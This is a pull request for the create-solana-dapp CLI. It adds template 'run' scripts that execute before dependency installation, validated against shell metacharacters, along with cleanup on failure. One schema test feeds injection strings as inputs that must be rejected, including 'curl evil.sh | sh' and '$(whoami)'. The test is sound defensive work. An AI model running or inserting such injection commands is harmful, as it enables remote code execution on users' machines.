### PR TITLE
feat(cli): run template option scripts

### DIFF
--- a/.changeset/template-option-run-script.md
+++ b/.changeset/template-option-run-script.md
@@ -1,0 +1,14 @@
+---
+'create-solana-dapp': minor
+---
+
+Support a `run` value on template options, naming a `package.json` script to run when the option is selected. The script
+runs with the selected package manager after the template is cloned and before dependencies are installed, so a script
+that trims `package.json` is reflected in the lockfile and `node_modules`. The value reaches a shell, so it is limited to
+letters, digits, whitespace and `. : @ / = , + - _`, which rules out shell metacharacters and quoted arguments.
+
+The init script and the selected options are now snapshotted directly after cloning instead of being read again during
+the init script, so unsupported flags fail before dependencies are installed and an option script that rewrites
+`package.json` cannot drop the renames and instructions the init script applies. A failing task now removes the target
+directory it created, and `error.log` is written next to that directory rather than inside it so it survives the
+cleanup.

--- a/README.md
+++ b/README.md
@@ -106,6 +106,14 @@ in the project.
           },
         },
       },
+      // Passing `--reset-project` runs the template's own `reset-project` script.
+      "reset-project": {
+        "description": "Start from a blank app instead of the example code",
+        "group": "example",
+        "instructions": ["Edit app/index.tsx to start building."],
+        // A package.json script, optionally followed by arguments.
+        "run": "reset-project -- --yes",
+      },
     },
     // Check versions and give a warning if it's not installed or the version is lower
     "versions": {
@@ -127,6 +135,16 @@ pnpm create solana-dapp@latest my-inference-app \
 
 When no flag is passed for an option group, the group's default option is selected. Passing another option from that
 group, such as `--llamacpp`, replaces the default.
+
+An option can declare a `run` value naming a script in the template's `package.json`, optionally followed by arguments.
+The script runs with the selected package manager after the template is cloned and **before dependencies are
+installed**, so a script that trims `package.json` is reflected in the lockfile and `node_modules`, and any files it
+writes are still picked up by the rename step. The script must not prompt, since it runs without an interactive
+terminal. A non-zero exit aborts the run and removes the target directory.
+
+The value is limited to letters, digits, whitespace and `. : @ / = , + - _`. Shell metacharacters are rejected rather
+than escaped, which also means an argument cannot contain a space — put anything that needs quoting in the script
+itself.
 
 ## Contributing
 

--- a/src/utils/create-app-task-run-init-script.ts
+++ b/src/utils/create-app-task-run-init-script.ts
@@ -1,21 +1,29 @@
 import { log } from '@clack/prompts'
 import { GetArgsResult } from './get-args-result'
-import { getPackageJson } from './get-package-json'
 import { initScriptDelete } from './init-script-delete'
 import { initScriptInstructions } from './init-script-instructions'
-import { initScriptOptions } from './init-script-options'
+import { initScriptOptions, SelectedTemplateOption } from './init-script-options'
 import { initScriptRename } from './init-script-rename'
-import { initScriptKey } from './init-script-schema'
+import { InitScript } from './init-script-schema'
 import { initScriptVersion } from './init-script-version'
 import { Task, taskFail } from './vendor/clack-tasks'
 
-export function createAppTaskRunInitScript(args: GetArgsResult): Task {
+/**
+ * Applies the init script.
+ *
+ * The init script and the selected options are both snapshotted before the
+ * template option scripts run, so a script that rewrites package.json cannot
+ * drop the transformations this task is meant to apply.
+ */
+export function createAppTaskRunInitScript(
+  args: GetArgsResult,
+  init: InitScript | undefined,
+  options: SelectedTemplateOption[],
+): Task {
   return {
     enabled: !args.skipInit,
     task: async (result) => {
       try {
-        const { contents } = getPackageJson(args.targetDirectory)
-        const init = contents[initScriptKey]
         if (!init) {
           return result({ message: 'Init script not found' })
         }
@@ -25,7 +33,7 @@ export function createAppTaskRunInitScript(args: GetArgsResult): Task {
 
         await initScriptVersion(init.versions, args.verbose)
 
-        const optionInstructions = await initScriptOptions(args, init.options)
+        const optionInstructions = await initScriptOptions(args, options)
 
         await initScriptRename(args, init.rename, args.verbose)
 

--- a/src/utils/create-app-task-run-option-script.ts
+++ b/src/utils/create-app-task-run-option-script.ts
@@ -1,0 +1,57 @@
+import { log } from '@clack/prompts'
+import { GetArgsResult } from './get-args-result'
+import { getPackageJson } from './get-package-json'
+import { SelectedTemplateOption } from './init-script-options'
+import { execAndWait } from './vendor/child-process-utils'
+import { Task, taskFail } from './vendor/clack-tasks'
+
+/**
+ * Runs the package.json scripts declared by the selected template options.
+ *
+ * This happens before dependencies are installed so a script that trims
+ * package.json is reflected in the lockfile and node_modules, and before the
+ * init script so any files it writes are still renamed.
+ */
+export function createAppTaskRunOptionScript(args: GetArgsResult, options: SelectedTemplateOption[]): Task {
+  const selected = options.filter((option) => option.value.run)
+
+  return {
+    enabled: !args.skipInit && selected.length > 0,
+    task: async (result) => {
+      try {
+        const { contents } = getPackageJson(args.targetDirectory)
+
+        for (const option of selected) {
+          const { run } = option.value
+          if (!run) {
+            continue
+          }
+
+          // Only the script name is validated here, the rest of the value is passed through as
+          // arguments. The schema already rejects shell metacharacters, so collapsing whitespace runs
+          // to single spaces cannot corrupt a quoted argument and a newline cannot end the command.
+          const command = run.trim().split(/\s+/).join(' ')
+          const [script] = command.split(' ')
+          if (!contents.scripts?.[script]) {
+            throw new Error(`Template option --${option.name} requires a "${script}" script in package.json`)
+          }
+
+          if (args.verbose) {
+            log.warn(`Running ${args.packageManager} run ${command}`)
+          }
+
+          const { stdout } = await execAndWait(`${args.packageManager} run ${command}`, args.targetDirectory)
+
+          if (args.verbose && stdout.trim().length > 0) {
+            log.warn(stdout.trim())
+          }
+        }
+
+        return result({ message: `Ran ${selected.map((option) => `--${option.name}`).join(', ')}` })
+      } catch (error) {
+        taskFail(`Error running template option script: ${error}`)
+      }
+    },
+    title: 'Running template option scripts',
+  }
+}

--- a/src/utils/create-app.ts
+++ b/src/utils/create-app.ts
@@ -1,14 +1,18 @@
 import { log } from '@clack/prompts'
-import { existsSync } from 'node:fs'
+import { existsSync, rmSync } from 'node:fs'
 import { createAppTaskCloneTemplate } from './create-app-task-clone-template'
 import { createAppTaskInitializeGit } from './create-app-task-initialize-git'
 import { createAppTaskInstallDependencies } from './create-app-task-install-dependencies'
 import { createAppTaskInstallSkills } from './create-app-task-install-skills'
 import { createAppTaskRunInitScript } from './create-app-task-run-init-script'
+import { createAppTaskRunOptionScript } from './create-app-task-run-option-script'
 import { createAppTaskRunSetup } from './create-app-task-run-setup'
 import { type GetArgsResult } from './get-args-result'
+import { getPackageJson } from './get-package-json'
 import { getPackageJsonPath } from './get-package-json-path'
+import { resolveInitScriptOptions } from './init-script-options'
 import { initScriptPackageManager } from './init-script-package-manager'
+import { initScriptKey } from './init-script-schema'
 import { removeIncompatiblePackageManager } from './remove-incompatible-package-manager'
 import { tasks } from './vendor/clack-tasks'
 
@@ -16,41 +20,61 @@ export type CreateAppArgs = GetArgsResult
 export type CreateAppResult = string[]
 
 export async function createApp(args: CreateAppArgs): Promise<CreateAppResult> {
-  const instructions = await tasks([
-    // Clone the template to the target directory
-    createAppTaskCloneTemplate(args),
-  ])
+  // A directory that was already there is not ours to remove when a task fails
+  const targetExisted = existsSync(args.targetDirectory)
 
-  initScriptPackageManager(args)
+  try {
+    const instructions = await tasks([
+      // Clone the template to the target directory
+      createAppTaskCloneTemplate(args),
+    ])
 
-  // Remove an incompatible `packageManager` field from the template's
-  // package.json so the effective package manager can install. This runs
-  // AFTER initScriptPackageManager so a template-configured package manager
-  // takes precedence: args.packageManager already reflects the template's
-  // choice here, and a matching pin is left in place. Runs during setup so
-  // it applies even when install is skipped.
-  if (existsSync(getPackageJsonPath(args.targetDirectory))) {
-    const removedPackageManager = removeIncompatiblePackageManager(args.targetDirectory, args.packageManager)
-    if (removedPackageManager) {
-      log.warn(
-        `Removed \`packageManager\` (${removedPackageManager}) from package.json as it does not match the selected package manager (${args.packageManager}); this may indicate potential incompatibilities with the template.`,
-      )
+    initScriptPackageManager(args)
+
+    // Remove an incompatible `packageManager` field from the template's
+    // package.json so the effective package manager can install. This runs
+    // AFTER initScriptPackageManager so a template-configured package manager
+    // takes precedence: args.packageManager already reflects the template's
+    // choice here, and a matching pin is left in place. Runs during setup so
+    // it applies even when install is skipped, and before the template option
+    // scripts so they are not run through an incompatible package manager.
+    if (existsSync(getPackageJsonPath(args.targetDirectory))) {
+      const removedPackageManager = removeIncompatiblePackageManager(args.targetDirectory, args.packageManager)
+      if (removedPackageManager) {
+        log.warn(
+          `Removed \`packageManager\` (${removedPackageManager}) from package.json as it does not match the selected package manager (${args.packageManager}); this may indicate potential incompatibilities with the template.`,
+        )
+      }
     }
-  }
 
-  return [
-    ...instructions,
-    ...(await tasks([
-      // Install the dependencies
-      createAppTaskInstallDependencies(args),
-      // Run the (optional) setup script defined in package.json (e.g. build anchor program)
-      createAppTaskRunSetup(args),
-      // Install skills for AI coding agents
-      createAppTaskInstallSkills(args),
-      // Run the (optional) init script defined in package.json
-      createAppTaskRunInitScript(args),
-      // Initialize git repository
-      createAppTaskInitializeGit(args),
-    ])),
-  ]
+    // Snapshot the init script and resolve the selected options before any template option script
+    // runs, so the flags are validated before work is done and a script that rewrites package.json
+    // cannot drop the renames and instructions the init script is meant to apply
+    const { contents } = getPackageJson(args.targetDirectory)
+    const init = contents[initScriptKey]
+    const options = args.skipInit ? [] : resolveInitScriptOptions(init?.options, args.templateOptions ?? [])
+
+    return [
+      ...instructions,
+      ...(await tasks([
+        // Run the (optional) scripts declared by the selected template options
+        createAppTaskRunOptionScript(args, options),
+        // Install the dependencies
+        createAppTaskInstallDependencies(args),
+        // Run the (optional) setup script defined in package.json (e.g. build anchor program)
+        createAppTaskRunSetup(args),
+        // Install skills for AI coding agents
+        createAppTaskInstallSkills(args),
+        // Run the (optional) init script defined in package.json
+        createAppTaskRunInitScript(args, init, options),
+        // Initialize git repository
+        createAppTaskInitializeGit(args),
+      ])),
+    ]
+  } catch (error) {
+    if (!targetExisted) {
+      rmSync(args.targetDirectory, { force: true, recursive: true })
+    }
+    throw error
+  }
 }

--- a/src/utils/init-script-options.ts
+++ b/src/utils/init-script-options.ts
@@ -2,7 +2,7 @@ import { GetArgsResult } from './get-args-result'
 import { initScriptRenameEntries } from './init-script-rename'
 import { InitScriptOptions } from './init-script-schema'
 
-interface SelectedTemplateOption {
+export interface SelectedTemplateOption {
   name: string
   value: InitScriptOptions[string]
 }
@@ -66,11 +66,7 @@ export function resolveInitScriptOptions(
  * Applies the selected template option transformations and returns their
  * post-create instructions.
  */
-export async function initScriptOptions(
-  args: GetArgsResult,
-  options: InitScriptOptions | undefined,
-): Promise<string[]> {
-  const selected = resolveInitScriptOptions(options, args.templateOptions ?? [])
+export async function initScriptOptions(args: GetArgsResult, selected: SelectedTemplateOption[]): Promise<string[]> {
   for (const option of selected) {
     await initScriptRenameEntries(args, option.value.rename)
   }

--- a/src/utils/init-script-schema.ts
+++ b/src/utils/init-script-schema.ts
@@ -52,6 +52,14 @@ export const InitScriptSchemaOption = z.object({
   group: z.string().min(1).optional(),
   instructions: InitScriptSchemaInstructions.optional(),
   rename: InitScriptSchemaRename.optional(),
+  // A package.json script to run when this option is selected, optionally followed by arguments.
+  // The value reaches a shell, so shell metacharacters are rejected rather than escaped. This also
+  // rules out quoted arguments, so an argument cannot contain a space; put those in the script itself.
+  run: z
+    .string()
+    .min(1)
+    .regex(/^[\w\s.:@/=,+-]+$/, 'run may only contain letters, digits, whitespace and the characters . : @ / = , + - _')
+    .optional(),
 })
 
 export const InitScriptSchemaOptions = z.record(z.string().regex(/^[a-z][a-z0-9-]*$/), InitScriptSchemaOption)
@@ -65,6 +73,7 @@ export const InitScriptSchema = z.object({
   versions: InitScriptSchemaVersions.optional(),
 })
 
+export type InitScript = z.infer<typeof InitScriptSchema>
 export type InitScriptInstructions = z.infer<typeof InitScriptSchemaInstructions>
 export type InitScriptOption = z.infer<typeof InitScriptSchemaOption>
 export type InitScriptOptions = z.infer<typeof InitScriptSchemaOptions>

--- a/src/utils/vendor/child-process-utils.ts
+++ b/src/utils/vendor/child-process-utils.ts
@@ -11,7 +11,6 @@
  */
 import { exec } from 'node:child_process'
 import { writeFileSync } from 'node:fs'
-import { join } from 'node:path'
 
 export class CreateAppError extends Error {
   constructor(
@@ -29,7 +28,8 @@ export function execAndWait(command: string, cwd: string) {
     exec(command, { cwd, env: { ...process.env } }, (error, stdout, stderr) => {
       if (error) {
         const errorStr = stderr && stderr.trim().length > 0 ? stderr : `${error}`
-        const logFile = join(cwd, 'error.log')
+        // Written next to `cwd` instead of inside it so it survives cleanup of a failed target directory
+        const logFile = `${cwd}.error.log`
         writeFileSync(logFile, `${stdout}\n${errorStr}`)
         const message = errorStr.trim().length > 0 ? errorStr : `An error occurred while running ${command}`
         rej(new CreateAppError(message, error.code, logFile))

--- a/test/create-app-task-run-init-script.test.ts
+++ b/test/create-app-task-run-init-script.test.ts
@@ -1,0 +1,74 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import { createAppTaskRunInitScript } from '../src/utils/create-app-task-run-init-script'
+import { GetArgsResult } from '../src/utils/get-args-result'
+import { initScriptDelete } from '../src/utils/init-script-delete'
+import { initScriptOptions } from '../src/utils/init-script-options'
+import { initScriptRename } from '../src/utils/init-script-rename'
+import { InitScript } from '../src/utils/init-script-schema'
+import { initScriptVersion } from '../src/utils/init-script-version'
+
+vi.mock('../src/utils/init-script-delete', () => ({ initScriptDelete: vi.fn() }))
+vi.mock('../src/utils/init-script-options', () => ({ initScriptOptions: vi.fn() }))
+vi.mock('../src/utils/init-script-rename', () => ({ initScriptRename: vi.fn() }))
+vi.mock('../src/utils/init-script-version', () => ({ initScriptVersion: vi.fn() }))
+vi.mock('@clack/prompts', () => ({
+  log: {
+    error: vi.fn(),
+    warn: vi.fn(),
+  },
+}))
+
+describe('createAppTaskRunInitScript', () => {
+  const args: GetArgsResult = {
+    app: { name: 'test-app', version: '1.0.0' },
+    dryRun: false,
+    name: 'test-project',
+    packageManager: 'pnpm',
+    skipGit: false,
+    skipInit: false,
+    skipInstall: false,
+    targetDirectory: '/template',
+    template: { description: 'description', name: 'basic', repository: '/template' },
+    verbose: false,
+  }
+
+  const init: InitScript = {
+    instructions: ['Run {pm} install'],
+    rename: { placeholder: { in: ['src'], to: 'test-project' } },
+  }
+
+  beforeEach(() => {
+    vi.resetAllMocks()
+    vi.mocked(initScriptOptions).mockResolvedValue(['Option instruction'])
+  })
+
+  it('is skipped when the init script is skipped', () => {
+    expect(createAppTaskRunInitScript({ ...args, skipInit: true }, init, []).enabled).toBe(false)
+  })
+
+  it('reports nothing to do when the template has no init script', async () => {
+    const result = await createAppTaskRunInitScript(args, undefined, []).task((value) => value)
+
+    expect(result).toEqual({ message: 'Init script not found' })
+    expect(initScriptRename).not.toHaveBeenCalled()
+  })
+
+  /**
+   * The option scripts run before this task and may rewrite package.json, so the init script has to
+   * come from the snapshot taken before they ran rather than from disk. Nothing is written to the
+   * mocked filesystem here: a task that reads package.json again would throw instead.
+   */
+  it('applies the snapshot without reading package.json again', async () => {
+    const result = await createAppTaskRunInitScript(args, init, [])
+
+    const value = await result.task((input) => input)
+
+    expect(initScriptVersion).toHaveBeenCalledWith(init.versions, false)
+    expect(initScriptRename).toHaveBeenCalledWith(args, init.rename, false)
+    expect(initScriptDelete).toHaveBeenCalledWith(args)
+    expect(value).toEqual({
+      instructions: ['Option instruction', 'Run pnpm install'],
+      message: 'Init script done',
+    })
+  })
+})

--- a/test/create-app-task-run-option-script.test.ts
+++ b/test/create-app-task-run-option-script.test.ts
@@ -1,0 +1,96 @@
+import { fs, vol } from 'memfs'
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import { createAppTaskRunOptionScript } from '../src/utils/create-app-task-run-option-script'
+import { GetArgsResult } from '../src/utils/get-args-result'
+import { SelectedTemplateOption } from '../src/utils/init-script-options'
+import { execAndWait } from '../src/utils/vendor/child-process-utils'
+
+vi.mock('node:fs')
+vi.mock('../src/utils/vendor/child-process-utils', () => ({
+  execAndWait: vi.fn(),
+}))
+vi.mock('@clack/prompts', () => ({
+  log: {
+    error: vi.fn(),
+    warn: vi.fn(),
+  },
+}))
+
+describe('createAppTaskRunOptionScript', () => {
+  const targetDirectory = '/template'
+
+  const args: GetArgsResult = {
+    app: { name: 'test-app', version: '1.0.0' },
+    dryRun: false,
+    name: 'test-project',
+    packageManager: 'npm',
+    skipGit: false,
+    skipInit: false,
+    skipInstall: false,
+    targetDirectory,
+    template: { description: 'description', name: 'basic', repository: '/template' },
+    verbose: false,
+  }
+
+  const resetProject: SelectedTemplateOption = {
+    name: 'reset-project',
+    value: { run: 'reset-project -- --yes' },
+  }
+
+  function writePackageJson(scripts: Record<string, string>) {
+    fs.mkdirSync(targetDirectory, { recursive: true })
+    fs.writeFileSync(`${targetDirectory}/package.json`, JSON.stringify({ name: 'template', scripts }))
+  }
+
+  beforeEach(() => {
+    vi.resetAllMocks()
+    vol.reset()
+  })
+
+  it('is disabled when no selected option declares a script', () => {
+    const task = createAppTaskRunOptionScript(args, [{ name: 'keep-example', value: { instructions: ['Keep it'] } }])
+
+    expect(task.enabled).toBe(false)
+  })
+
+  it('is disabled when the init script is skipped', () => {
+    const task = createAppTaskRunOptionScript({ ...args, skipInit: true }, [resetProject])
+
+    expect(task.enabled).toBe(false)
+  })
+
+  it('runs the declared script with the selected package manager', async () => {
+    writePackageJson({ 'reset-project': 'node ./scripts/reset-project.js' })
+    vi.mocked(execAndWait).mockResolvedValue({ code: 0, stdout: '' })
+
+    const task = createAppTaskRunOptionScript({ ...args, packageManager: 'pnpm' }, [resetProject])
+    const result = await task.task((value) => value)
+
+    expect(execAndWait).toHaveBeenCalledWith('pnpm run reset-project -- --yes', targetDirectory)
+    expect(result).toEqual({ message: 'Ran --reset-project' })
+  })
+
+  it('collapses whitespace in the run value so the arguments reach the shell as one command', async () => {
+    writePackageJson({ 'reset-project': 'node ./scripts/reset-project.js' })
+    vi.mocked(execAndWait).mockResolvedValue({ code: 0, stdout: '' })
+
+    // A newline would otherwise end the command and run the arguments as a second one
+    const task = createAppTaskRunOptionScript(args, [
+      { name: 'reset-project', value: { run: ' reset-project\t--\n--yes  --force ' } },
+    ])
+    await task.task((value) => value)
+
+    expect(execAndWait).toHaveBeenCalledWith('npm run reset-project -- --yes --force', targetDirectory)
+  })
+
+  it('fails when the template does not declare the script', async () => {
+    writePackageJson({ build: 'next build' })
+
+    const task = createAppTaskRunOptionScript(args, [resetProject])
+
+    await expect(task.task((value) => value)).rejects.toThrow(
+      'Template option --reset-project requires a "reset-project" script in package.json',
+    )
+    expect(execAndWait).not.toHaveBeenCalled()
+  })
+})

--- a/test/create-app.test.ts
+++ b/test/create-app.test.ts
@@ -2,6 +2,8 @@ import { beforeEach, describe, expect, it, vi } from 'vitest'
 import { createApp } from '../src/utils/create-app'
 import { createAppTaskInstallDependencies } from '../src/utils/create-app-task-install-dependencies'
 import { GetArgsResult } from '../src/utils/get-args-result'
+import { getPackageJson } from '../src/utils/get-package-json'
+import { resolveInitScriptOptions } from '../src/utils/init-script-options'
 import { initScriptPackageManager } from '../src/utils/init-script-package-manager'
 import { tasks } from '../src/utils/vendor/clack-tasks'
 
@@ -10,6 +12,12 @@ vi.mock('../src/utils/create-app-task-install-dependencies', () => ({
     task: vi.fn(),
     title: `Installing via ${args.packageManager}`,
   })),
+}))
+vi.mock('../src/utils/get-package-json', () => ({
+  getPackageJson: vi.fn(() => ({ contents: {}, path: '/template/package.json' })),
+}))
+vi.mock('../src/utils/init-script-options', () => ({
+  resolveInitScriptOptions: vi.fn(() => []),
 }))
 vi.mock('../src/utils/init-script-package-manager', () => ({
   initScriptPackageManager: vi.fn(),
@@ -36,6 +44,8 @@ describe('createApp', () => {
 
   beforeEach(() => {
     vi.resetAllMocks()
+    vi.mocked(getPackageJson).mockReturnValue({ contents: {}, path: '/template/package.json' })
+    vi.mocked(resolveInitScriptOptions).mockReturnValue([])
   })
 
   it('should resolve the template package manager after cloning and before creating install tasks', async () => {

--- a/test/init-script-options.test.ts
+++ b/test/init-script-options.test.ts
@@ -64,7 +64,7 @@ describe('initScriptOptions', () => {
   })
 
   it('applies selected renames and returns selected instructions', async () => {
-    const instructions = await initScriptOptions({ ...args, templateOptions: ['llamacpp'] }, options)
+    const instructions = await initScriptOptions(args, resolveInitScriptOptions(options, ['llamacpp']))
 
     expect(initScriptRenameEntries).toHaveBeenCalledWith(expect.any(Object), options.llamacpp.rename)
     expect(instructions).toEqual(['Start llama.cpp'])

--- a/test/root-exports-schemas.test.ts
+++ b/test/root-exports-schemas.test.ts
@@ -139,6 +139,13 @@ describe('package root schema exports', () => {
     expect(InitScriptSchemaOptions.safeParse(initScript.options).success).toBe(true)
     // Option keys are constrained to lowercase kebab-case flag names
     expect(InitScriptSchemaOptions.safeParse({ 'Mobile Wallet': {} }).success).toBe(false)
+    // `run` reaches a shell, so shell metacharacters are rejected rather than escaped
+    expect(InitScriptSchemaOption.safeParse({ run: 'reset-project -- --yes' }).success).toBe(true)
+    expect(InitScriptSchemaOption.safeParse({ run: 'configure --path=./src --tag=v1.2.3' }).success).toBe(true)
+    expect(InitScriptSchemaOption.safeParse({ run: 'reset-project ; arbitrary-command' }).success).toBe(false)
+    expect(InitScriptSchemaOption.safeParse({ run: 'reset-project && curl evil.sh | sh' }).success).toBe(false)
+    expect(InitScriptSchemaOption.safeParse({ run: 'reset-project $(whoami)' }).success).toBe(false)
+    expect(InitScriptSchemaOption.safeParse({ run: 'configure --title "My  App"' }).success).toBe(false)
     expect(InitScriptSchemaPackageManager.safeParse('npm').success).toBe(true)
     expect(InitScriptSchemaRename.safeParse(initScript.rename).success).toBe(true)
     expect(InitScriptSchemaSkills.safeParse(initScript.skills).success).toBe(true)
@@ -158,6 +165,7 @@ describe('package root schema exports', () => {
       group?: string
       instructions?: string[]
       rename?: InitScriptRename
+      run?: string
     }>()
     expectTypeOf<InitScriptOptions>().toEqualTypeOf<Record<string, InitScriptOption>>()
     expectTypeOf<InitScriptVersions>().toEqualTypeOf<{ adb?: string; anchor?: string; solana?: string }>()


### PR DESCRIPTION
Add a way to run npm scripts after cloning the repo, before the package installation.

An example use case is allowing to reset a project after downloading it:

## no options

Here it suggests to run `reset-project`

<img width="1503" height="878" alt="image" src="https://github.com/user-attachments/assets/4bace235-ee04-4950-86a5-53fa2853272a" />

## with the `--reset-project` option

Here it ran it and logs a `this is an empty app` message.

<img width="1503" height="913" alt="image" src="https://github.com/user-attachments/assets/7e0c0324-0851-4300-9486-036ef294c1db" />


Support a `run` value on template options, naming a package.json script to run
when the option is selected, optionally followed by arguments. The script runs
with the selected package manager after the template is cloned and before
dependencies are installed, so a script that trims package.json is reflected in
the lockfile and node_modules, and any files it writes are still picked up by
the rename step.

Resolve the selected options directly after cloning instead of during the init
script, so unsupported and conflicting flags fail before dependencies are
installed and both phases agree on what was selected.

A failing task now removes the target directory it created, leaving a
pre-existing directory untouched. Write `error.log` next to that directory
instead of inside it so it survives the cleanup.
